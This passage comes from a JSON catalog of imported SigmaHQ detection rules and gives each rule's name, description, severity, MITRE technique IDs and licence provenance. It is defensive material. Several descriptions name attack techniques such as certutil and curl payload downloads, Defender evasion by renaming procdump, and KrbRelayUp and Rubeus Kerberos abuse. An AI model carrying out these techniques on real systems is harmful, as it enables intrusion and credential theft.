"sigmahq-sigma-11d00fff-5dc3-428c-8184-801f292faec0", "type": "detection", "name": "Service Registry Key Read Access Request", "description": "Detects \"read access\" requests on the services registry key.\nAdversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-registry-key-read-access-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "11d00fff-5dc3-428c-8184-801f292faec0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_registry_permissions_weakness_check.yml" } }, { "id": "sigmahq-sigma-1228c958-e64e-4e71-92ad-7d429f4138ba", "type": "detection", "name": "Script Interpreter Execution From Suspicious Folder", "description": "Detects suspicious script execution from suspicious directories or folders accessible by environment variables that may indicate malware activity.\nScript interpreters (cscript, wscript, mshta, powershell) executing from folders like Temp, Public, or user profile directories may suggest attempts to evade detection or execute malicious scripts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/script-interpreter-execution-from-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1228c958-e64e-4e71-92ad-7d429f4138ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" } }, { "id": "sigmahq-sigma-123e4e6d-b123-48f8-b261-7214938acaf0", "type": "detection", "name": "Startup/Logon Script Added to Group Policy Object", "description": "Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001", "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/startup-logon-script-added-to-group-policy-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "123e4e6d-b123-48f8-b261-7214938acaf0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_group_policy_startup_script_added_to_gpo.yml" } }, { "id": "sigmahq-sigma-1277f594-a7d1-4f28-a2d3-73af5cbeab43", "type": "detection", "name": "Windows Shell/Scripting Application File Write to Suspicious Folder", "description": "Detects Windows shells and scripting applications that write files to suspicious folders", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-shell-scripting-application-file-write-to-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml" } }, { "id": "sigmahq-sigma-1279262f-1464-422f-ac0d-5b545320c526", "type": "detection", "name": "AWS KMS Imported Key Material Usage", "description": "Detects the import or deletion of key material in AWS KMS, which can be used as part of ransomware attacks. This activity is uncommon and provides a high certainty signal.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1486", "T1608.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-kms-imported-key-material-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1279262f-1464-422f-ac0d-5b545320c526", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_kms_import_key_material.yml" } }, { "id": "sigmahq-sigma-12827a56-61a4-476a-a9cb-f3068f191073", "type": "detection", "name": "HackTool - KrbRelayUp Execution", "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558.003", "T1550.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-krbrelayup-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "12827a56-61a4-476a-a9cb-f3068f191073", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_krbrelayup.yml" } }, { "id": "sigmahq-sigma-128faeef-79dd-44ca-b43c-a9e236a60f49", "type": "detection", "name": "Unfamiliar Sign-In Properties", "description": "Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unfamiliar-sign-in-properties.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "128faeef-79dd-44ca-b43c-a9e236a60f49", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_unfamilar_sign_in.yml" } }, { "id": "sigmahq-sigma-129966c9-de17-4334-a123-8b58172e664d", "type": "detection", "name": "Potential Windows Defender AV Bypass Via Dump64.EXE Rename", "description": "Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder.\nCurrently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-windows-defender-av-bypass-via-dump64-exe-rename.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "129966c9-de17-4334-a123-8b58172e664d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dump64_defender_av_bypass_rename.yml" } }, { "id": "sigmahq-sigma-12b8e9f5-96b2-41e1-9a42-8c6779a5c184", "type": "detection", "name": "Potentially Suspicious Execution Of PDQDeployRunner", "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-execution-of-pdqdeployrunner.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml" } }, { "id": "sigmahq-sigma-12ba6a38-adb3-4d6b-91ba-a7fb248e3199", "type": "detection", "name": "Password Policy Enumerated", "description": "Detects when the password policy is enumerated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-policy-enumerated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "12ba6a38-adb3-4d6b-91ba-a7fb248e3199", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_password_policy_enumerated.yml" } }, { "id": "sigmahq-sigma-12d027c3-b48c-4d9d-8bb6-a732200034b2", "type": "detection", "name": "Azure Kubernetes Service Account Modified or Deleted", "description": "Identifies when a service account is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531", "T1485", "T1496", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-service-account-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "12d027c3-b48c-4d9d-8bb6-a732200034b2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_service_account_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-12e6d621-194f-4f59-90cc-1959e21e69f7", "type": "detection", "name": "Register new Logon Process by Rubeus", "description": "Detects potential use of Rubeus via registered new trusted logon process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/register-new-logon-process-by-rubeus.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml" } }, { "id": "sigmahq-sigma-12f6b752-042d-483e-bf9c-915a6d06ad75", "type": "detection", "name": "Windows Firewall Disabled via PowerShell", "description": "Detects attempts to disable the Windows Firewall using PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-firewall-disabled-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "12f6b752-042d-483e-bf9c-915a6d06ad75", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_disable_firewall.yml" } }, { "id": "sigmahq-sigma-12fbff88-16b5-4b42-9754-cd001a789fb3", "type": "detection", "name": "CodePage Modification Via MODE.COM To Russian Language", "description": "Detects a CodePage modification using the \"mode.com\" utility to Russian language.\nThis behavior has been used by threat actors behind Dharma ransomware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codepage-modification-via-mode-com-to-russian-language.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "12fbff88-16b5-4b42-9754-cd001a789fb3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mode_codepage_russian.yml" } }, { "id": "sigmahq-sigma-130c9e58-28ac-4f83-8574-0a4cc913b97e", "type": "detection", "name": "Potential Winnti Dropper Activity", "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-winnti-dropper-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" } }, { "id": "sigmahq-sigma-1321dc4e-a1fe-481d-a016-52c45f0c8b4f", "type": "detection", "name": "Windows Defender Exclusions Added", "description": "Detects the Setting of Windows Defender Exclusions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-exclusions-added.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_config_change_exclusion_added.yml" } }, { "id": "sigmahq-sigma-1327381e-6ab0-4f38-b583-4c1b8346a56b", "type": "detection", "name": "Potential Command Line Path Traversal Evasion Attempt", "description": "Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-command-line-path-traversal-evasion-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml" } }, { "id": "sigmahq-sigma-138d3531-8793-4f50-a2cd-f291b2863d78", "type": "detection", "name": "Suspicious Service Path Modification", "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-service-path-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "138d3531-8793-4f50-a2cd-f291b2863d78", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml" } }, { "id": "sigmahq-sigma-139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c", "type": "detection", "name": "Okta Admin Role Assignment Created", "description": "Detects when a new admin role assignment is created. Which could be a sign of privilege escalation or persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-admin-role-assignment-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_admin_role_assignment_created.yml" } }, { "id": "sigmahq-sigma-13acf386-b8c6-4fe0-9a6e-c4756b974698", "type": "detection", "name": "Remote PowerShell Sessions Network Connections (WinRM)", "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-powershell-sessions-network-connections-winrm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_remote_powershell_session.yml" } }, { "id": "sigmahq-sigma-13addce7-47b2-4ca0-a98f-1de964d1d669", "type": "detection", "name": "SCM Database Handle Failure", "description": "Detects non-system users failing to get a handle of the SCM database.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scm-database-handle-failure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13addce7-47b2-4ca0-a98f-1de964d1d669", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_scm_database_handle_failure.yml" } }, { "id": "sigmahq-sigma-13c02350-4177-4e45-ac17-cf7ca628ff5e", "type": "detection", "name": "Files With System DLL Name In Unsuspected Locations", "description": "Detects the creation of a file with the \".dll\" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of \"System32\", \"SysWOW64\", etc.).\nIt is highly recommended to perform an initial baseline before using this rule in production.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/files-with-system-dll-name-in-unsuspected-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13c02350-4177-4e45-ac17-cf7ca628ff5e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_creation_system_dll_files.yml" } }, { "id": "sigmahq-sigma-13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", "type": "detection", "name": "Windows Update Error", "description": "Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1584" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-update-error.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml" } }, { "id": "sigmahq-sigma-13db8d2e-7723-4c2c-93c1-a4d36994f7ef", "type": "detection", "name": "Potential In-Memory Download And Compile Of Payloads", "description": "Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.007", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-in-memory-download-and-compile-of-payloads.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13db8d2e-7723-4c2c-93c1-a4d36994f7ef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_susp_in_memory_download_and_compile.yml" } }, { "id": "sigmahq-sigma-13e6fe51-d478-4c7e-b0f2-6da9b400a829", "type": "detection", "name": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-downloaded-from-direct-ip-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml" } }, { "id": "sigmahq-sigma-13f08f54-e705-4498-91fd-cce9d9cee9f1", "type": "detection", "name": "Potentially Suspicious Shell Script Creation in Profile Folder", "description": "Detects the creation of shell scripts under the \"profile.d\" path.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-shell-script-creation-in-profile-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13f08f54-e705-4498-91fd-cce9d9cee9f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml" } }, { "id": "sigmahq-sigma-13f2d3f5-6497-44a7-bf5f-dc13ffafe5dc", "type": "detection", "name": "Azure Login Bypassing Conditional Access Policies", "description": "Detects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and InTune device trust using a tool like TokenSmith.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-login-bypassing-conditional-access-policies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13f2d3f5-6497-44a7-bf5f-dc13ffafe5dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/audit/microsoft365_bypass_conditional_access.yml" } }, { "id": "sigmahq-sigma-13f81a90-a69c-4fab-8f07-b5bb55416a9f", "type": "detection", "name": "Google Cloud Service Account Disabled or Deleted", "description": "Identifies when a service account is disabled or deleted in Google Cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-service-account-disabled-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_service_account_disabled_or_deleted.yml" } }, { "id": "sigmahq-sigma-13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "type": "detection", "name": "DHCP Server Loaded the CallOut DLL", "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dhcp-server-loaded-the-callout-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml" } }, { "id": "sigmahq-sigma-1412aa78-a24c-4abd-83df-767dfb2c5bbe", "type": "detection", "name": "Potentially Suspicious WebDAV LNK Execution", "description": "Detects possible execution via LNK file accessed on a WebDAV server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-webdav-lnk-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1412aa78-a24c-4abd-83df-767dfb2c5bbe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_webdav_lnk_execution.yml" } }, { "id": "sigmahq-sigma-1444443e-6757-43e4-9ea4-c8fc705f79a2", "type": "detection", "name": "Boot Configuration Tampering Via Bcdedit.EXE", "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/boot-configuration-tampering-via-bcdedit-exe.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 